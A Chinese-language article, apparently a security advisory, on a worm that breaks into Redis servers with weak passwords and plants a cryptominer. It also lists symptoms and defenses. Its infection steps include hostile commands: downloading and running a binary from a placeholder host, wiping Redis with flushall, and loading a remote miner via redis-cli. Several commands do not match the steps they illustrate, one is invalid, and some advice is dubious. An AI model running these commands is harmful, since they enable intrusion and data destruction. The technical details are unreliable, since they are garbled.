1. 感染细节
最近,网络安全公司发现,一种新型的Linux Redis自动化挖矿感染蠕虫开始向互联网上的开放Redis实例发起攻击。这种蠕虫利用Redis的默认密码策略,通过猜测密码来远程入侵Redis服务器,然后在服务器上植入挖矿程序,利用机器的计算能力来挖掘虚拟货币。
该蠕虫在入侵Redis服务器后,会生成一些后门代码,这些代码让蠕虫能够快速地向其他Redis实例进行传播。同时,该蠕虫还设置了一些规则来避免在同一台服务器上重复感染。
1.1 入侵流程
下面是该蠕虫的入侵流程:
利用默认密码策略尝试登录Redis服务器
cat /proc/cpuinfo
这里的默认密码策略指的是Redis服务器默认开启的无密码或者给出的初始密码过于简单的情况。如果服务器有良好的安全策略,包括强密码策略、IP白名单等,则可以有效地预防此类攻击。
在Redis服务器上生成几个Unix后门程序 rmd 和 httpd
cd /etc/ && curl -O http://example.com/redisscan && sed -i 's/1.1.1.1/{server}/g' redisscan && chmod +x redisscan && nohup /etc/redisscan &
匹配合适的ip段进行扫描
该蠕虫会自动扫描网络中的其他Redis实例,并对扫描到的其他实例进行入侵。扫描到的其他Redis实例中,只要存在弱密码或入侵后门,该蠕虫便会利用漏洞对其进行感染。
利用Redis-cli进行植入挖矿程序
redis-cli -h {ip} -p {port} flushall
redis-cli -h {ip} -p {port} --eval http://example.com/cuckoopw > /dev/null
这里cuckoopw是挖矿程序的名字,其会自动连接到挖矿池,并进行挖矿。
1.2 感染特征
该蠕虫的感染特征如下:
服务器CPU占用率超高,甚至封顶;
服务器存在大量未知的后门和监听端口;
Redis实例中存在异常的key;
服务器的网络流量异常。
2. 预防措施
在发现Redis自动化挖矿感染蠕虫活动后,我们需要采取以下措施才能有效地防范此类攻击。
2.1 加强Redis服务器的安全配置
建议管理员们加强Redis服务器的安全配置,包括使用强密码策略、限制IP访问、关闭无用服务等。
2.2 关闭Redis的AOF功能
关闭Redis的AOF(Append Only File)功能可以有效地降低Redis服务器被攻击的风险。AOF是一种持久化方式,会将Redis发生的每一次操作记录下来,而这些记录可能被攻击者利用来发动攻击。
2.3 定期检查Redis服务器
管理员需要定期检查Redis服务器的安全状况,并通过各种手段(如安全审计工具、端口扫描工具等)来发现潜在的漏洞。同时,对于发现的漏洞,管理员应该及时修复并进行漏洞分析,避免漏掉其它存在的蠕虫程序。
2.4 开启Redis认证
Redis提供了认证机制,可以通过密码来保证数据的安全。管理员可以在Redis服务器上开启认证机制,并设置复杂的密码来提高数据的安全性。
2.5 定期更新脚本库
管理员需要定期更新脚本库,以确保所有脚本都是最新的,没有存在已经被修复的漏洞。
总结
自动化挖矿感染蠕虫是一种相对新型、具有一定的隐蔽性的网络攻击方式,而Linux Redis自动化挖矿感染蠕虫则是近期发现的一种十分典型的自动化挖矿感染蠕虫。为了防范此类攻击,管理员需要掌握相关技术以及采取相应的预防措施。只有这样才能保障企业的信息安全。